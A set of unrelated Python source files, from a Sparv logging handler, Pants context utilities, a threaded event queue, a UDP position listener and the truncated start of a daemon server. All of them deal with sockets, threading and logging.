levels.pop(levels.index(logging.NOTSET))
log_level = logging.getLevelName(min(levels))
log_server = LogServer(log_level=log_level)
config.pluginmanager.register(log_server, "saltfactories-log-server")
@pytest.hookimpl(tryfirst=True)
def pytest_sessionstart(session):
log_server = session.config.pluginmanager.get_plugin("saltfactories-log-server")
log_server.start()
@pytest.hookimpl(trylast=True)
def pytest_sessionfinish(session):
log_server = session.config.pluginmanager.get_plugin("saltfactories-log-server")
log_server.stop()
|
log_handler.py
|
"""Handler for log messages, both from the logging library and from Snakemake."""
import datetime
import logging
import logging.handlers
import os
import pickle
import re
import socketserver
import struct
import threading
import time
from collections import defaultdict
from datetime import timedelta
from pathlib import Path
from typing import Optional
import rich.progress as progress
from rich.logging import RichHandler
from rich.text import Text
from snakemake import logger
from sparv.core import paths
from sparv.core.console import console
from sparv.util.misc import SparvErrorMessage
LOG_FORMAT = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
LOG_FORMAT_DEBUG = "%(asctime)s - %(name)s (%(process)d) - %(levelname)s - %(message)s"
DATE_FORMAT = "%Y-%m-%d %H:%M:%S"
TIME_FORMAT = "%H:%M:%S"
# Add internal logging level used for non-logging-related communication from child processes to log handler
INTERNAL = 100
logging.addLevelName(INTERNAL, "INTERNAL")
def export_dirs(self, dirs):
"""Send list of export dirs to log handler."""
if self.isEnabledFor(INTERNAL):
self._log(INTERNAL, "export_dirs", (), extra={"export_dirs": dirs})
# Add log function to logger
logging.export_dirs = export_dirs
logging.Logger.export_dirs = export_dirs
# Messages from the Sparv core
messages = {
"missing_configs": defaultdict(set),
"missing_binaries": defaultdict(set),
"missing_classes": defaultdict(set)
}
class LogRecordStreamHandler(socketserver.StreamRequestHandler):
"""Handler for streaming logging requests."""
def handle(self):
"""Handle multiple requests - each expected to be a 4-byte length followed by the LogRecord in pickle format."""
while True:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.handle_log_record(record)
@staticmethod
def handle_log_record(record):
"""Handle log record."""
sparv_logger = logging.getLogger("sparv_logging")
sparv_logger.handle(record)
class LogLevelCounterHandler(logging.Handler):
"""Handler that counts the number of log messages per log level."""
def __init__(self, count_dict, *args, **kwargs):
super().__init__(*args, **kwargs)
self.levelcount = count_dict
def emit(self, record):
"""Increment level counter for each log message."""
if record.levelno != INTERNAL:
self.levelcount[record.levelname] += 1
class FileHandlerWithDirCreation(logging.FileHandler):
"""FileHandler which creates necessary directories when the first log message is handled."""
def emit(self, record):
"""Emit a record and create necessary directories if needed."""
if self.stream is None:
os.makedirs(os.path.dirname(self.baseFilename), exist_ok=True)
super().emit(record)
class InternalFilter(logging.Filter):
"""Filter out internal log messages."""
def filter(self, record):
"""Filter out internal records."""
return record.levelno < INTERNAL
class InternalLogHandler(logging.Handler):
"""Handler for internal log messages."""
def __init__(self, export_dirs_list):
self.export_dirs_list = export_dirs_list
super().__init__()
def emit(self, record):
"""Handle log record."""
if record.msg == "export_dirs":
self.export_dirs_list.update(record.export_dirs)
class ModifiedRichHandler(RichHandler):
"""RichHandler modified to print names instead of paths."""
def emit(self, record: logging.LogRecord) -> None:
"""Replace path with name and call parent method."""
record.pathname = record.name
record.lineno = 0
super().emit(record)
class LogHandler:
"""Class providing a log handler for Snakemake."""
icon = "\U0001f426"
def __init__(self, progressbar=True, summary=False, log_level=None, log_file_level=None):
"""Initialize log handler.
Args:
progressbar: Set to False to disable progress bar. Enabled by default.
summary: Set to True to write a final summary (elapsed time). Disabled by default.
log_level: Log level for logging to stdout.
log_file_level: Log level for logging to file.
"""
self.use_progressbar = progressbar
self.show_summary = summary
self.log_level = log_level
self.log_file_level = log_file_level
self.log_filename = None
self.log_levelcount = defaultdict(int)
self.finished = False
self.handled_error = False
self.messages = defaultdict(list)
self.missing_configs_re = None
self.missing_binaries_re = None
self.missing_classes_re = None
self.export_dirs = set()
self.start_time = time.time()
self.jobs = {}
# Progress bar related variables
self.progress_mgr = None
self.exit = lambda *x: None
self.progress: Optional[progress.Progress] = None
self.bar: Optional[progress.TaskID] = None
self.last_percentage = 0
# Create a simple TCP socket-based logging receiver
tcpserver = socketserver.ThreadingTCPServer(("localhost", 0), RequestHandlerClass=LogRecordStreamHandler)
self.log_server = tcpserver.server_address
# Start a thread with the server
server_thread = threading.Thread(target=tcpserver.serve_forever)
server_thread.daemon = True # Exit the server thread when the main thread terminates
server_thread.start()
if not self.use_progressbar: # When using progress bar, we must wait until after the bar is initialized.
self.setup_loggers()
def setup_loggers(self):
"""Set up log handlers for logging to stdout and log file."""
if not self.log_level or not self.log_file_level:
return
sparv_logger = logging.getLogger("sparv_logging")
internal_filter = InternalFilter()
# stdout logger
stream_handler = ModifiedRichHandler(enable_link_path=False, console=console)
stream_handler.setLevel(self.log_level.upper())
stream_handler.addFilter(internal_filter)
log_format = "%(message)s" if stream_handler.level > logging.DEBUG else "(%(process)d) - %(message)s"
stream_handler.setFormatter(logging.Formatter(log_format, datefmt=TIME_FORMAT))
sparv_logger.addHandler(stream_handler)
# File logger
self.log_filename = "{}.log".format(datetime.datetime.now().strftime("%Y-%m-%d_%H.%M.%S.%f"))
file_handler = FileHandlerWithDirCreation(os.path.join(paths.log_dir, self.log_filename), mode="w",
encoding="UTF-8", delay=True)
file_handler.setLevel(self.log_file_level.upper())
file_handler.addFilter(internal_filter)
log_format = LOG_FORMAT if file_handler.level > logging.DEBUG else LOG_FORMAT_DEBUG
file_handler.setFormatter(logging.Formatter(log_format))
sparv_logger.addHandler(file_handler)
# Level counter
levelcount_handler = LogLevelCounterHandler(self.log_levelcount)
levelcount_handler.setLevel(logging.WARNING)
sparv_logger.addHandler(levelcount_handler)
# Internal log handler
internal_handler = InternalLogHandler(self.export_dirs)
internal_handler.setLevel(INTERNAL)
sparv_logger.addHandler(internal_handler)
def setup_bar(self, total: int):
"""Initialize the progress bar."""
print()
self.progress_mgr = progress.Progress(
progress.TextColumn("[progress.description]{task.description}"),
progress.BarColumn(),
progress.TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
progress.TimeRemainingColumn(),
progress.TextColumn("{task.fields[text]}"),
console=console
)
self.exit = type(self.progress_mgr).__exit__
self.progress = type(self.progress_mgr).__enter__(self.progress_mgr)
self.bar = self.progress.add_task(self.icon, total=total, text="")
# Logging needs to be set up after the bar, to make use if its print hook
self.setup_loggers()
@staticmethod
def info(msg):
"""Print info message."""
console.print(Text(msg, style="green"))
@staticmethod
def warning(msg):
"""Print warning message."""
console.print(Text(msg, style="yellow"))
@staticmethod
def error(msg):
"""Print error message."""
console.print(Text(msg, style="red"))
def log_handler(self, msg):
"""Log handler for Snakemake displaying a progress bar."""
def missing_config_message(source):
"""Create error message when config variables are missing."""
_variables = messages["missing_configs"][source]
_message = "The following config variable{} need{} to be set:\n • {}".format(
*("s", "") if len(_variables) > 1 else ("", "s"),
"\n • ".join(_variables))
self.messages["error"].append((source, _message))
def missing_binary_message(source):
"""Create error message when binaries are missing."""
_binaries = messages["missing_binaries"][source]
_message = "The following executable{} {} needed but could not be found:\n • {}".format(
*("s", "are") if len(_binaries) > 1 else ("", "is"),
"\n • ".join(_binaries))
self.messages["error"].append((source, _message))
def missing_class_message(source, classes=None):
"""Create error message when class variables are missing."""
_variables = messages["missing_classes"][source]
if not _variables:
_variables = classes
_message = "The following class{} need{} to be set:\n • {}".format(
*("es", "") if len(_variables) > 1 else ("", "s"),
"\n • ".join(_variables))
if "text" in _variables:
_message += "\n\nNote: The 'text' class can also be set using the configuration variable " \
"'import.document_annotation', but only if it refers to an annotation from the " \
"source files."
self.messages["error"].append((source, _message))
level = msg["level"]
if level == "run_info" and self.use_progressbar:
# Parse list of jobs do to and total job count
lines = msg["msg"].splitlines()[2:]
total_jobs = lines[-1].strip()
self.jobs = {}
for j in lines[:-1]:
_, count, job = j.split("\t")
self.jobs[job.replace("::", ":")] = int(count)
if self.bar is None:
# Get number of jobs
if total_jobs.isdigit():
self.setup_bar(int(total_jobs))
elif level == "progress":
if self.use_progressbar:
# Set up progress bar if needed
if self.bar is None:
self.setup_bar(msg["total"])
# Advance progress
self.progress.advance(self.bar)
# Print regular updates if output is not a terminal (i.e. doesn't support the progress bar)
if not console.is_terminal:
percentage = (100 * msg["done"]) // msg["total"]
if percentage > self.last_percentage:
self.last_percentage = percentage
print(f"Progress: {percentage}%")
if msg["done"] == msg["total"]:
self.stop()
elif level == "job_info" and self.use_progressbar:
if msg["msg"] and self.bar is not None:
# Update progress status message
self.progress.update(self.bar, text=msg["msg"])
elif level == "info":
if msg["msg"] == "Nothing to be done.":
self.info(msg["msg"])
elif level == "error":
handled = False
# SparvErrorMessage exception from pipeline core
if "SparvErrorMessage" in msg["msg"]:
# Parse error message
message = re.search(
r"{}([^\n]*)\n([^\n]*)\n(.*?){}".format(SparvErrorMessage.start_marker,
SparvErrorMessage.end_marker),
msg["msg"], flags=re.DOTALL)
if message:
module, function, error_message = message.groups()
error_source = ":".join((module, function)) if module and function else None
self.messages["error"].append((error_source, error_message))
handled = True
# Exit status 123 means a Sparv module raised a SparvErrorMessage exception
# The error message has already been logged so doesn't need to be printed again
elif "exit status 123" in msg["msg"] or ("SystemExit" in msg["msg"] and "123" in msg["msg"]):
handled = True
# Errors due to missing config variables or binaries leading to missing input files
elif "MissingInputException" in msg["msg"] or "MissingOutputException" in msg["msg"]:
msg_contents = re.search(r" for rule (\S+):\n(.+)", msg["msg"])
rule_name, filelist = msg_contents.groups()
rule_name = rule_name.replace("::", ":")
if self.missing_configs_re.search(filelist):
handled = True
missing_config_message(rule_name)
elif self.missing_binaries_re.search(filelist):
handled = True
missing_binary_message(rule_name)
elif self.missing_classes_re.search(filelist):
handled = True
missing_class_message(rule_name, self.missing_classes_re.findall(filelist))
# Unhandled errors
if not handled:
self.messages["unhandled_error"].append(msg)
else:
self.handled_error = True
elif level in ("warning", "job_error"):
# Save other errors and warnings for later
self.messages["unhandled_error"].append(msg)
elif level == "dag_debug" and "job" in msg:
# Create regular expressions for searching for missing config variables or binaries
if self.missing_configs_re is None:
all_configs = set([v for varlist in messages["missing_configs"].values() for v in varlist])
self.missing_configs_re = re.compile(r"\[({})]".format("|".join(all_configs)))
if self.missing_binaries_re is None:
all_binaries = set([b for binlist in messages["missing_binaries"].values() for b in binlist])
self.missing_binaries_re = re.compile(r"^({})$".format("|".join(all_binaries)), flags=re.MULTILINE)
if self.missing_classes_re is None:
all_classes = set([v for varlist in messages["missing_classes"].values() for v in varlist])
self.missing_classes_re = re.compile(r"<({})>".format("|".join(all_classes)))
# Check the rules selected for the current operation, and see if any is unusable due to missing configs
if msg["status"] == "selected":
job_name = str(msg["job"]).replace("::", ":")
if job_name in messages["missing_configs"]:
missing_config_message(job_name)
self.handled_error = True
# We need to stop Snakemake by raising an exception, and BrokenPipeError is the only exception
# not leading to a full traceback being printed (due to Snakemake's handling of exceptions)
raise BrokenPipeError()
def stop(self):
"""Stop the progress bar and output any error messages."""
# Make sure this is only run once
if not self.finished:
# Stop progress bar
if self.bar is not None:
# Add message about elapsed time
elapsed = round(time.time() - self.start_time)
self.progress.update(self.bar, text=f"Total time: {timedelta(seconds=elapsed)}")
# Stop bar
self.exit(self.progress_mgr, None, None, None)
self.finished = True
print()
# Execution failed but we handled the error
if self.handled_error:
# Print any collected core error messages
if self.messages["error"]:
self.error("Sparv exited with the following error message{}:".format(
"s" if len(self.messages) > 1 else ""))
for message in self.messages["error"]:
error_source, msg = message
error_source = f"[{error_source}]\n" if error_source else ""
self.error(f"\n{error_source}{msg}")
else:
# Errors from modules have already been logged, so notify user
self.error(
"Job execution failed. See log messages above or {} for details.".format(
os.path.join(paths.log_dir, self.log_filename)))
# Defer to Snakemake's default log handler for unhandled errors
elif self.messages["unhandled_error"]:
for error in self.messages["unhandled_error"]:
logger.text_handler(error)
elif self.export_dirs:
self.info("The exported files can be found in the following location{}:\n • {}".format(
"s" if len(self.export_dirs) > 1 else "", "\n • ".join(sorted(self.export_dirs))))
elif self.log_levelcount:
# Errors or warnings were logged but execution finished anyway. Notify user of potential problems.
problems = []
if self.log_levelcount["ERROR"]:
problems.append("{} error{}".format(self.log_levelcount["ERROR"],
"s" if self.log_levelcount["ERROR"] > 1 else ""))
if self.log_levelcount["WARNING"]:
problems.append("{} warning{}".format(self.log_levelcount["WARNING"],
"s" if self.log_levelcount["WARNING"] > 1 else ""))
self.warning(
"Job execution finished but {} occured. See log messages above or {} for details.".format(
" and ".join(problems), os.path.join(paths.log_dir, self.log_filename)))
if self.show_summary:
if self.messages:
print()
elapsed = round(time.time() - self.start_time)
self.info("Time elapsed: {}".format(timedelta(seconds=elapsed)))
@staticmethod
def cleanup():
"""Remove Snakemake log files."""
snakemake_log_file = logger.get_logfile()
if snakemake_log_file is not None:
log_file = Path(snakemake_log_file)
if log_file.is_file():
try:
log_file.unlink()
except PermissionError:
pass
def setup_logging(log_server, log_level: Optional[str] = "warning", log_file_level: Optional[str] = "warning"):
"""Set up logging with socket handler."""
# Use the lowest log level, but never higher than warning
log_level = min(logging.WARNING, getattr(logging, log_level.upper()), getattr(logging, log_file_level.upper()))
socket_logger = logging.getLogger("sparv")
socket_logger.setLevel(log_level)
socket_handler = logging.handlers.SocketHandler(*log_server)
socket_logger.addHandler(socket_handler)
|
contextutil.py
|
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import logging
import os
import shutil
import signal
import sys
import tempfile
import threading
import time
import uuid
import zipfile
from contextlib import closing, contextmanager
from queue import Queue
from socketserver import TCPServer
from types import FrameType
from typing import IO, Any, Callable, Iterator, Mapping, Optional, Type, Union, cast
from colors import green
from pants.util.dirutil import safe_delete
from pants.util.tarutil import TarFile
class InvalidZipPath(ValueError):
"""Indicates a bad zip file path."""
@contextmanager
def environment_as(**kwargs: Optional[str]) -> Iterator[None]:
"""Update the environment to the supplied values, for example:
with environment_as(PYTHONPATH='foo:bar:baz',
PYTHON='/usr/bin/python2.7'):
subprocess.Popen(foo).wait()
"""
new_environment = kwargs
old_environment = {}
def setenv(key: str, val: Optional[str]) -> None:
if val is not None:
os.environ[key] = val
else:
if key in os.environ:
del os.environ[key]
for key, val in new_environment.items():
old_environment[key] = os.environ.get(key)
setenv(key, val)
try:
yield
finally:
for key, val in old_environment.items():
setenv(key, val)
def _purge_env() -> None:
# N.B. Without the use of `del` here (which calls `os.unsetenv` under the hood), subprocess
# invokes or other things that may access the environment at the C level may not see the
# correct env vars (i.e. we can't just replace os.environ with an empty dict).
# See https://docs.python.org/3/library/os.html#os.unsetenv for more info.
#
# Wraps iterable in list() to make a copy and avoid issues with deleting while iterating.
for k in list(os.environ.keys()):
del os.environ[k]
def _restore_env(env: Mapping[str, str]) -> None:
for k, v in env.items():
os.environ[k] = v
@contextmanager
def hermetic_environment_as(**kwargs: Optional[str]) -> Iterator[None]:
"""Set the environment to the supplied values from an empty state."""
old_environment = os.environ.copy()
_purge_env()
try:
with environment_as(**kwargs):
yield
finally:
_purge_env()
_restore_env(old_environment)
@contextmanager
def _stdio_stream_as(src_fd: int, dst_fd: int, dst_sys_attribute: str, mode: str) -> Iterator[None]:
"""Replace the given dst_fd and attribute on `sys` with an open handle to the given src_fd."""
if src_fd == -1:
src = open("/dev/null", mode)
src_fd = src.fileno()
# Capture the python and os level file handles.
old_dst = getattr(sys, dst_sys_attribute)
old_dst_fd = os.dup(dst_fd)
if src_fd != dst_fd:
os.dup2(src_fd, dst_fd)
# Open up a new file handle to temporarily replace the python-level io object, then yield.
new_dst = os.fdopen(dst_fd, mode)
setattr(sys, dst_sys_attribute, new_dst)
try:
yield
finally:
new_dst.close()
# Restore the python and os level file handles.
os.dup2(old_dst_fd, dst_fd)
setattr(sys, dst_sys_attribute, old_dst)
@contextmanager
def stdio_as(stdout_fd: int, stderr_fd: int, stdin_fd: int) -> Iterator[None]:
"""Redirect sys.{stdout, stderr, stdin} to alternate file descriptors.
As a special case, if a given destination fd is `-1`, we will replace it with an open file handle
to `/dev/null`.
NB: If the filehandles for sys.{stdout, stderr, stdin} have previously been closed, it's
possible that the OS has repurposed fds `0, 1, 2` to represent other files or sockets. It's
impossible for this method to locate all python objects which refer to those fds, so it's up
to the caller to guarantee that `0, 1, 2` are safe to replace.
The streams expect unicode. To write and read bytes, access their buffer, e.g. `stdin.buffer.read()`.
"""
with _stdio_stream_as(stdin_fd, 0, "stdin", "r"), _stdio_stream_as(
stdout_fd, 1, "stdout", "w"
), _stdio_stream_as(stderr_fd, 2, "stderr", "w"):
yield
@contextmanager
def signal_handler_as(
sig: int, handler: Union[int, Callable[[int, FrameType], None]]
) -> Iterator[None]:
"""Temporarily replaces a signal handler for the given signal and restores the old handler.
:param sig: The target signal to replace the handler for (e.g. signal.SIGINT).
:param handler: The new temporary handler.
"""
old_handler = signal.signal(sig, handler)
try:
yield
finally:
signal.signal(sig, old_handler)
@contextmanager
def temporary_dir(
root_dir: Optional[str] = None,
cleanup: bool = True,
suffix: Optional[str] = None,
permissions: Optional[int] = None,
prefix: Optional[str] = tempfile.template,
) -> Iterator[str]:
"""A with-context that creates a temporary directory.
:API: public
You may specify the following keyword args:
:param root_dir: The parent directory to create the temporary directory.
:param cleanup: Whether or not to clean up the temporary directory.
:param permissions: If provided, sets the directory permissions to this mode.
"""
path = tempfile.mkdtemp(dir=root_dir, suffix=suffix, prefix=prefix)
try:
if permissions is not None:
os.chmod(path, permissions)
yield path
finally:
if cleanup:
shutil.rmtree(path, ignore_errors=True)
@contextmanager
def temporary_file_path(
root_dir: Optional[str] = None,
cleanup: bool = True,
suffix: Optional[str] = None,
permissions: Optional[int] = None,
) -> Iterator[str]:
"""A with-context that creates a temporary file and returns its path.
:API: public
You may specify the following keyword args:
:param root_dir: The parent directory to create the temporary file.
:param cleanup: Whether or not to clean up the temporary file.
"""
with temporary_file(root_dir, cleanup=cleanup, suffix=suffix, permissions=permissions) as fd:
fd.close()
yield fd.name
@contextmanager
def temporary_file(
root_dir: Optional[str] = None,
cleanup: bool = True,
suffix: Optional[str] = None,
permissions: Optional[int] = None,
binary_mode: bool = True,
) -> Iterator[IO]:
"""A with-context that creates a temporary file and returns a writeable file descriptor to it.
You may specify the following keyword args:
:param root_dir: The parent directory to create the temporary file.
:param cleanup: Whether or not to clean up the temporary file.
:param suffix: If suffix is specified, the file name will end with that suffix.
Otherwise there will be no suffix.
mkstemp() does not put a dot between the file name and the suffix;
if you need one, put it at the beginning of suffix.
See :py:class:`tempfile.NamedTemporaryFile`.
:param permissions: If provided, sets the file to use these permissions.
:param binary_mode: Whether file opens in binary or text mode.
"""
mode = "w+b" if binary_mode else "w+" # tempfile's default is 'w+b'
with tempfile.NamedTemporaryFile(suffix=suffix, dir=root_dir, delete=False, mode=mode) as fd:
try:
if permissions is not None:
os.chmod(fd.name, permissions)
yield fd
finally:
if cleanup:
safe_delete(fd.name)
@contextmanager
def safe_file(path: str, suffix: Optional[str] = None, cleanup: bool = True) -> Iterator[str]:
"""A with-context that copies a file, and copies the copy back to the original file on success.
This is useful for doing work on a file but only changing its state on success.
:param suffix: Use this suffix to create the copy. Otherwise use a random string.
:param cleanup: Whether or not to clean up the copy.
"""
safe_path = f"{path}.{(suffix or uuid.uuid4())}"
if os.path.exists(path):
shutil.copy(path, safe_path)
try:
yield safe_path
if cleanup:
shutil.move(safe_path, path)
else:
shutil.copy(safe_path, path)
finally:
if cleanup:
safe_delete(safe_path)
@contextmanager
def pushd(directory: str) -> Iterator[str]:
"""A with-context that encapsulates pushd/popd."""
cwd = os.getcwd()
os.chdir(directory)
try:
yield directory
finally:
os.chdir(cwd)
@contextmanager
def open_zip(path_or_file: Union[str, Any], *args, **kwargs) -> Iterator[zipfile.ZipFile]:
"""A with-context for zip files.
Passes through *args and **kwargs to zipfile.ZipFile.
:API: public
:param path_or_file: Full path to zip file.
:param args: Any extra args accepted by `zipfile.ZipFile`.
:param kwargs: Any extra keyword args accepted by `zipfile.ZipFile`.
:raises: `InvalidZipPath` if path_or_file is invalid.
:raises: `zipfile.BadZipfile` if zipfile.ZipFile cannot open a zip at path_or_file.
"""
if not path_or_file:
raise InvalidZipPath(f"Invalid zip location: {path_or_file}")
if "allowZip64" not in kwargs:
kwargs["allowZip64"] = True
try:
zf = zipfile.ZipFile(path_or_file, *args, **kwargs)
except zipfile.BadZipfile as bze:
# Use the realpath in order to follow symlinks back to the problem source file.
raise zipfile.BadZipfile(f"Bad Zipfile {os.path.realpath(path_or_file)}: {bze}")
try:
yield zf
finally:
zf.close()
@contextmanager
def open_tar(path_or_file: Union[str, Any], *args, **kwargs) -> Iterator[TarFile]:
"""A with-context for tar files. Passes through positional and kwargs to tarfile.open.
If path_or_file is a file, caller must close it separately.
"""
(path, fileobj) = (
(path_or_file, None) if isinstance(path_or_file, str) else (None, path_or_file)
)
kwargs["fileobj"] = fileobj
with closing(TarFile.open(path, *args, **kwargs)) as tar:
# We must cast the normal tarfile.TarFile to our custom pants.util.tarutil.TarFile.
typed_tar = cast(TarFile, tar)
yield typed_tar
class Timer:
"""Very basic with-context to time operations.
Example usage:
>>> from pants.util.contextutil import Timer
>>> with Timer() as timer:
... time.sleep(2)
...
>>> timer.elapsed
2.0020849704742432
"""
def __init__(self, clock=time) -> None:
self._clock = clock
def __enter__(self) -> "Timer":
self.start: float = self._clock.time()
self.finish: Optional[float] = None
return self
@property
def elapsed(self) -> float:
end_time: float = self.finish if self.finish is not None else self._clock.time()
return end_time - self.start
def __exit__(self, typ, val, traceback):
self.finish = self._clock.time()
@contextmanager
def exception_logging(logger: logging.Logger, msg: str) -> Iterator[None]:
"""Provides exception logging via `logger.exception` for a given block of code.
:param logger: The `Logger` instance to use for logging.
:param msg: The message to emit before `logger.exception` emits the traceback.
"""
try:
yield
except Exception:
logger.exception(msg)
raise
@contextmanager
def maybe_profiled(profile_path: Optional[str]) -> Iterator[None]:
"""A profiling context manager.
:param profile_path: The path to write profile information to. If `None`, this will no-op.
"""
if not profile_path:
yield
return
import cProfile
profiler = cProfile.Profile()
try:
profiler.enable()
yield
finally:
profiler.disable()
profiler.dump_stats(profile_path)
view_cmd = green(
"gprof2dot -f pstats {path} | dot -Tpng -o {path}.png && open {path}.png".format(
path=profile_path
)
)
logging.getLogger().info(
f"Dumped profile data to: {profile_path}\nUse e.g. {view_cmd} to render and view."
)
@contextmanager
def http_server(handler_class: Type) -> Iterator[int]:
def serve(port_queue: "Queue[int]", shutdown_queue: "Queue[bool]") -> None:
httpd = TCPServer(("", 0), handler_class)
httpd.timeout = 0.1
port_queue.put(httpd.server_address[1])
while shutdown_queue.empty():
httpd.handle_request()
port_queue: "Queue[int]" = Queue()
shutdown_queue: "Queue[bool]" = Queue()
t = threading.Thread(target=lambda: serve(port_queue, shutdown_queue))
t.daemon = True
t.start()
try:
yield port_queue.get(block=True)
finally:
shutdown_queue.put(True)
t.join()
|
handler.py
|
import logging
import time
from abc import ABCMeta
from collections import defaultdict
from queue import Queue
from threading import Lock, Thread
from __main__ import config
from ..types import ActiveHunter, Hunter
from ...core.events.types import HuntFinished
import threading
global queue_lock
queue_lock = Lock()
# Inherits Queue object, handles events asynchronously
class EventQueue(Queue, object):
def __init__(self, num_worker=10):
super(EventQueue, self).__init__()
self.passive_hunters = dict()
self.active_hunters = dict()
self.hooks = defaultdict(list)
self.running = True
self.workers = list()
for i in range(num_worker):
t = Thread(target=self.worker)
t.daemon = True
t.start()
self.workers.append(t)
t = Thread(target=self.notifier)
t.daemon = True
t.start()
# decorator wrapping for easy subscription
def subscribe(self, event, hook=None, predicate=None):
def wrapper(hook):
self.subscribe_event(event, hook=hook, predicate=predicate)
return hook
return wrapper
# getting uninstantiated event object
def subscribe_event(self, event, hook=None, predicate=None):
if ActiveHunter in hook.__mro__:
if not config.active:
return
else:
self.active_hunters[hook] = hook.__doc__
elif Hunter in hook.__mro__:
self.passive_hunters[hook] = hook.__doc__
if hook not in self.hooks[event]:
self.hooks[event].append((hook, predicate))
logging.debug('{} subscribed to {}'.format(hook, event))
# getting instantiated event object
def publish_event(self, event, caller=None):
logging.debug('Event {} got published with {}'.format(event.__class__, event))
for hooked_event in self.hooks.keys():
if hooked_event in event.__class__.__mro__:
for hook, predicate in self.hooks[hooked_event]:
if predicate and not predicate(event):
continue
if caller:
event.previous = caller.event
self.put(hook(event))
# executes callbacks on dedicated thread as a daemon
def worker(self):
while self.running:
queue_lock.acquire()
hook = self.get()
queue_lock.release()
try:
hook.execute()
except Exception as ex:
logging.debug(ex)
self.task_done()
logging.debug("closing thread...")
def notifier(self):
time.sleep(2)
while self.unfinished_tasks > 0:
logging.debug("{} tasks left".format(self.unfinished_tasks))
time.sleep(3)
# stops execution of all daemons
def free(self):
self.running = False
with self.mutex:
self.queue.clear()
handler = EventQueue(800)
|
listener.py
|
import SocketServer
import threading
import socket
import re
from PIL import Image
import kirk
import ImageTk
import Tkinter
from showTk import showTk
File = kirk.File
width = kirk.width
height = kirk.height
box_size = kirk.box_size
window = []
class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
pass
class MyUDPHandler(SocketServer.BaseRequestHandler):
def handle(self):
data = re.split(', ',self.request[0])
socket = self.request[1]
name = data[0]
x = int(data[1])
y = int(data[2])
sem.acquire()
if name in people:
people[name] = (x ,y)
else:
people.update({name:(x, y)})
print people
sem.release()
im = Image.open(File).copy()
im.paste("red", (x*box_size, y*box_size, x*box_size+box_size, y*box_size+box_size))
window.update(im = im)
if __name__ == "__main__":
sem = threading.Semaphore()
window = showTk(im = File)
people = dict([])
HOST, PORT = "<broadcast>", 8000
server = ThreadedUDPServer((HOST, PORT), MyUDPHandler)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
window.mainloop()
while(1):
pass
|
server.py
|
import os
import logging
import socket
import time
import pickle
import psutil
from argparse import ArgumentParser
from threading import Thread, Lock
from nesta.server.define import define
from nesta.server import schedule
from nesta.external.daemon import Daemon
from nesta.tasks.tasks import get_worker
from nesta.tasks.notice import get_notice
from nesta.utils.rabbitmq import RabbitMQClient
from nesta.utils.mysql import MySQLClient
from nesta.utils.log import init_logger
from nesta.configs.util import parse_env, parse_config
def parse_arguments():
parser = ArgumentParser("Nesta server")
parser.add_argument("--daemonize", "-d", dest="daemonize",
type=bool, default=True, help="daemonize or not")
return parser.parse_args()
class Server(Daemon):
def __init__(self, configs):
assert isinstance(configs, dict)
self._confgs = configs
self._config_common = configs["services"]["common"]
self._config_server = configs["services"]["server"]
logfile = self._confgs["services"]["server"]["logfile"]
super().__init__(
pidfile=self._confgs["services"]["server"]["pidfile"],
stdout=logfile,
stderr=logfile
)
self._logger = init_logger(
name="server",
logfile=logfile,
loglevel=configs["services"]["server"]["loglevel"]
)
self._worker = get_worker(**configs)
self._notice = get_notice(**configs)
self._interval = self._config_server["interval"]
self._status = define.STATUS_RUNNING if self._config_server[
"auto_start"] else define.STATUS_STOPPED
self._mutex = Lock()
def _run(self):
self._logger.info("Server has been started")
self._notice.send_task(
"notice",
kwargs={
"level": "INFO",
"msg": "Server has been started"
})
threads = [Thread(target=self._wrap, args=[func])
for func in [self._communicate, self._update_result]]
for t in threads:
t.start()
self._main()
"""
try:
self._wrap(self._main)
except Exception as e:
print (e)
"""
for t in threads:
t.join()
self._notice.send_task(
"notice",
kwargs={
"level": "CRITICAL",
"msg": "Server has been terminated"
})
self._logger.info("Server has been terminated")
def _set_status(self, status):
with self._mutex:
self._status = status
def _wrap(self, func, *args, **kwargs):
try:
func(*args, **kwargs)
except Exception as e:
self._status = define.STATUS_TERMINATED
self._logger.critical(f"Unexpected error, start to terminate :{e}")
self._notice.send_task(
"notice",
kwargs={
"level": "CRITICAL",
"msg" : "Unexpected error, start to terminate: {}".format(e)
})
def _communicate(self):
"""
thread for communicating with external clients(control)
"""
self._logger.debug("communicate thread has been started")
# prepare for server_socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(
(self._config_server["host"], self._config_server["port"]))
server_socket.listen()
server_socket.settimeout(0.5)
while True:
if self._status == define.STATUS_TERMINATED:
self._logger.debug("communicate thread has been terminated")
break
try:
client_socket, _ = server_socket.accept()
msg = client_socket.recv(1024).decode()
self._logger.info("Recieve msg from client: {}".format(msg))
if msg == "hi":
client_socket.sendall("hello".encode())
elif msg == "status":
client_socket.sendall(self._status.encode())
elif msg == "summary":
self._logger.info("Send summary")
cpu_count = psutil.cpu_count()
data = "status: {}, cpu: {}(%), memory: {}(%), loadavg: {}(%)".format(
self._status,
psutil.cpu_percent(),
psutil.virtual_memory().percent,
"/".join(["{:.0f}".format(x/cpu_count*100) for x in psutil.getloadavg()])
)
self._notice.send_task(
"notice",
kwargs={
"level": "INFO",
"msg": data
})
client_socket.sendall(data.encode())
else:
self._logger.warn(f"Unknown msg: {msg}")
client_socket.close()
except socket.timeout:
pass
except Exception as e:
self._logger.error(f"Unexpected error: {e}")
server_socket.close()
def _main(self):
"""
main thread for handling message queues and assigning jobs
"""
self._logger.debug("main thread has been started")
conn = MySQLClient()
conn.init(**self._config_common["mysql"])
mq_client = RabbitMQClient()
mq_client.init(**self._config_common["rabbitmq"])
queue = self._config_common["rabbitmq"]["queue"]
# purge and declare before starting
try:
pass
#mq_client.queue_purge(queue)
except:
pass
mq_client.queue_declare(queue)
is_first = True
while True:
if self._status == define.STATUS_TERMINATED:
self._logger.debug("main thread has been terminated")
break
# imte interval from second loop
if is_first is True:
is_first = False
else:
